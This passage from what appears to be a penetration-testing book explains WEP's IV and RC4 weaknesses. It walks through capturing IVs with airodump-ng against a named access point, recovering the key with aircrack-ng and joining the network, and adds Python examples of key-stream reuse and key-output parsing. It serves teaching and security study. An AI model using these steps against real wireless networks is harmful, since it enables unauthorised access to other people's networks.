WEP theory





The first encryption that we will discuss is Wired Equivalent Privacy (WEP) encryption, because it's the oldest one, and also the easiest one to break. WEP encryption uses a stream cipher called RC4; each packet is encrypted at the Access Point (AP), and then sent out into the air. Once the client receives it, the client will be able to decrypt the packet and read the information inside of it, since the client has the key. In short, the AP encrypts the packet and sends it, and the client receives and decrypts it. In the same way, when the client itself sends a packet, the client encrypts it and then sends it out, and the AP receives and decrypts it with the same key.

Each packet that is sent out is encrypted with its own key stream. WEP ensures that the key stream changes from packet to packet by using a 24-bit Initialization Vector (IV): the per-packet RC4 key is the IV followed by the shared WEP key, so a different IV gives a different key stream. The IV is a random number that is sent in each packet in plain text, which is not encrypted. If we read the packet, we will be able to read that part of it in plain text.

The problem with the IV is that it's very short (24 bits, which is not that long: only about 16.7 million possible values). In a busy network, there will be a very large number of packets sent, the possibilities of random IVs will be exhausted, and we will end up with two packets that have the same IV, and therefore the same key stream. If this happens, we can employ aircrack-ng, which uses statistical attacks to determine key streams; it will be able to determine the WEP key. Strictly speaking, the statistical attacks aircrack-ng implements (FMS/KoreK, and the PTW attack it uses by default) exploit the correlation between the plain-text IV and the first bytes of the RC4 key stream rather than requiring two packets with an identical IV, but the practical conclusion is the same: the more IVs we capture, the better.

From the preceding information, we know that the more IVs we collect, the more likely we'll be to successfully crack the WEP key. Our main goal, when we try to crack WEP, is to collect as many IVs as we can, because when we have a large number of IVs, we will end up with two packets that use the same IV, and aircrack-ng will be likely to determine the key stream and the WEP key for the target network. In the next part of this chapter, we will see how this actually works, and it should be easier to understand.
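To make the theory above concrete, the following is an added example (not code from the book) that implements plain RC4 with the WEP key layout, IV followed by the shared secret, and shows what IV reuse costs: two frames encrypted under the same IV share a key stream, so XORing their ciphertexts cancels the key stream and one known plaintext reveals the other. It also computes the birthday-bound estimate of how many packets it takes before a 24-bit IV repeats. The 40-bit key, IVs and plaintexts are constructed sample values; the real WEP CRC-32 integrity check value is omitted because it does not affect the key-stream reuse being demonstrated.

```python
import math

IV_BITS = 24  # WEP's IV size; the weakness discussed in the text


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4 (key scheduling + output generation), returning n key-stream bytes.
    WEP feeds RC4 the 24-bit IV followed by the shared secret (40 or 104 bits),
    so the key stream depends on both."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Returns the frame body as it travels over the air: plain-text IV || ciphertext.
    (The CRC-32 ICV that real WEP appends before encryption is left out.)"""
    if len(iv) != IV_BITS // 8:
        raise ValueError("WEP IV must be 3 bytes")
    keystream = rc4_keystream(iv + secret, len(plaintext))
    return iv + xor(plaintext, keystream)


def recover_with_known_plaintext(frame_known: bytes, known_plaintext: bytes,
                                 frame_unknown: bytes):
    """If both frames carry the same IV they were encrypted with the same key
    stream, so c1 ^ p1 gives the key stream and c2 ^ keystream gives p2.
    Returns None when the IVs differ, because then there is no reuse to exploit."""
    iv1, c1 = frame_known[:3], frame_known[3:]
    iv2, c2 = frame_unknown[:3], frame_unknown[3:]
    if iv1 != iv2:
        return None
    keystream = xor(c1, known_plaintext)
    return xor(c2[:len(keystream)], keystream)


def expected_packets_until_iv_collision(iv_bits: int = IV_BITS) -> float:
    """Birthday bound: about sqrt(pi/2 * N) random draws before one of N values repeats."""
    return math.sqrt(math.pi / 2 * 2 ** iv_bits)


if __name__ == "__main__":
    secret = bytes.fromhex("0102030405")        # constructed 40-bit ("64-bit WEP") key
    iv = bytes.fromhex("0a0b0c")                # constructed IV, reused by the AP below
    p1 = b"GET /index.html "                     # traffic whose content we can guess
    p2 = b"secret password!"                     # traffic we want to read
    f1 = wep_encrypt(secret, iv, p1)
    f2 = wep_encrypt(secret, iv, p2)
    print("recovered:", recover_with_known_plaintext(f1, p1, f2))
    print("packets before a 24-bit IV is expected to repeat: "
          f"{expected_packets_until_iv_collision():.0f}")
```

The collision estimate comes out at roughly five thousand packets, far fewer than the 16.7 million IV values might suggest, which is why a busy network leaks reused key streams quickly. Note that the recovery step needs only the captured frames and a guess at one plaintext; the WEP key itself is never touched.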

Basic WEP cracking





From the previous section, we know that to crack a WEP key, all we have to do is sniff packets from the target network and gather as many IVs as possible. Once we have done that, aircrack-ng will be able to use statistical attacks to determine the key stream and the WEP key for the target network. Obviously, when we have more than two packets, the method is going to work better, and our chances of breaking the key will be higher, so we're going to try to gather as many IVs as possible.

Let's look at the most basic case of cracking a WEP key. The Wi-Fi card must be in monitor mode, and the first thing we're going to do is see all of the networks that are within our Wi-Fi range; then, we're going to target one of those networks. We're going to run airodump-ng wlan0, a very basic command, where wlan0 stands for the monitor-mode interface. The following will be displayed as output:





The first network that has come up is Test; this is the network that we're going to perform our attacks on. We're going to launch airodump-ng against the Test network by using the following command:

airodump-ng --bssid 54:B8:0A:9E:54:2D --channel 11 --write basic-test-ap wlan0

Here, we enter the --bssid of the Test AP and launch airodump-ng against it. We include the --channel, number 11, so the card stays on that channel instead of hopping, and we add --write to store all of the packets that we capture into a file whose prefix is basic-test-ap. As we run the preceding command, we will be able to see the output in the following screenshot; the target network is quite a busy one, and the data and frame counters keep going up. For a WEP network, the #Data column is the count of captured data packets with unique IVs, which is exactly what we are trying to collect:









It is a busy network; the following is the section where we can see the clients:





All we have to do now is launch aircrack-ng, which is part of the aircrack suite, against the file that airodump-ng has created for us. We can launch aircrack-ng against it even if we didn't stop airodump-ng; it will keep reading the file, and it will read the new packets that airodump-ng is capturing. The command to use is as follows:

aircrack-ng basic-test-ap-01.cap

When we use aircrack-ng, we put in the filename basic-test-ap-01.cap (airodump-ng appends -01 to the prefix we gave it, and increments the number on each new run). While the file is still being written, getting larger and larger with the inclusion of new packets, we can run aircrack-ng, and it will keep getting updated, eventually giving us the key we need. If aircrack-ng fails to determine the key, it waits until it has 5,000 more IVs, and then tries again.

The number of IVs actually needed depends on the type of WEP encryption. There are two types of WEP encryption: 128-bit and 64-bit. The only difference is the length of the key: a 64-bit key is a 40-bit secret plus the 24-bit IV, and a 128-bit key is a 104-bit secret plus the 24-bit IV. Obviously, 64-bit requires a lower number of IVs than 128-bit. Remember that when we discussed aircrack-ng, we indicated that the more packets we get with unique IVs, the higher our chances of cracking the WEP key are.

Now, we basically wait until aircrack-ng can successfully crack the WEP key. Once it finds the key, we can press Ctrl + C. As we can see in the following screenshot, aircrack-ng has successfully managed to get the key from the data packets captured so far; this is because the target AP uses a 64-bit key:









Let's look at how we can use this key to connect to the network. We are going to copy the key and use it to connect. aircrack-ng prints the key as hex bytes separated by colons; when entering it as a WEP key, remove the colons (or use the ASCII form, if aircrack-ng shows one). We can then connect to the target network:
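The two steps just described, reading the key out of aircrack-ng's output and telling a 64-bit key from a 128-bit one by its length, are easy to get wrong by hand (a stray colon, or a key that happens to look like ASCII). The following added example, which is not code from the book or from the aircrack-ng project, parses the KEY FOUND! line, strips the colons, classifies the key by its secret length, and reports an ASCII form only when every byte is printable. The aircrack-ng output it is fed is a constructed sample in the format the tool prints.

```python
import re

# Matches the line aircrack-ng prints on success, e.g. "KEY FOUND! [ 1F:1A:32:9C:00 ]".
KEY_FOUND_RE = re.compile(
    r"KEY FOUND!\s*\[\s*([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2})*)\s*\]"
)

# WEP secret-key sizes in bytes. The marketing names add the 24-bit IV:
# 40 + 24 = 64, 104 + 24 = 128.
WEP_KEY_TYPES = {
    5: "64-bit WEP (40-bit secret + 24-bit IV)",
    13: "128-bit WEP (104-bit secret + 24-bit IV)",
}

# Constructed sample of aircrack-ng's output; not a real capture.
SAMPLE_AIRCRACK_OUTPUT = """\
                                 Aircrack-ng 1.6

                 [00:00:03] Tested 1514 keys (got 30566 IVs)

   KB    depth   byte(vote)
    0    0/  9   1F(39680) 4E(33024) 88(31744) 28(31488)
    1    0/  1   1A(51712) 0A(35840) D6(35328) 23(33536)
             KEY FOUND! [ 1F:1A:32:9C:00 ]
\tDecrypted correctly: 100%
"""


def parse_key_found(aircrack_output: str):
    """Returns the recovered key as bytes, or None if aircrack-ng has not found it yet
    (for example while it is still printing 'Failed. Next try with 5000 IVs.')."""
    match = KEY_FOUND_RE.search(aircrack_output)
    if match is None:
        return None
    return bytes.fromhex(match.group(1).replace(":", ""))


def describe_wep_key(key: bytes) -> dict:
    """Gives the forms needed to connect: colon-free hex, an ASCII string if every
    byte is printable, and the key type inferred from the secret length."""
    printable = all(0x20 <= b < 0x7F for b in key)
    return {
        "hex": key.hex().upper(),
        "ascii": key.decode("ascii") if printable else None,
        "type": WEP_KEY_TYPES.get(len(key), f"non-standard ({len(key) * 8}-bit secret)"),
    }


if __name__ == "__main__":
    key = parse_key_found(SAMPLE_AIRCRACK_OUTPUT)
    if key is None:
        print("no key yet; keep capturing IVs")
    else:
        info = describe_wep_key(key)
        print(f"{info['type']}: hex {info['hex']}, ascii {info['ascii']}")
```

A key of 5 bytes is the 64-bit case shown in the screenshot above; 13 bytes means 128-bit and, as the text notes, will usually have needed more IVs. The hex form without colons is what wireless clients expect when you enter a WEP key; if an ASCII form exists, the same key can be entered as text instead.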





As you can see, our connection has been established; we successfully recovered the WEP key from the target network and used it to join. We can go ahead and confirm that we have connectivity by pinging Google:



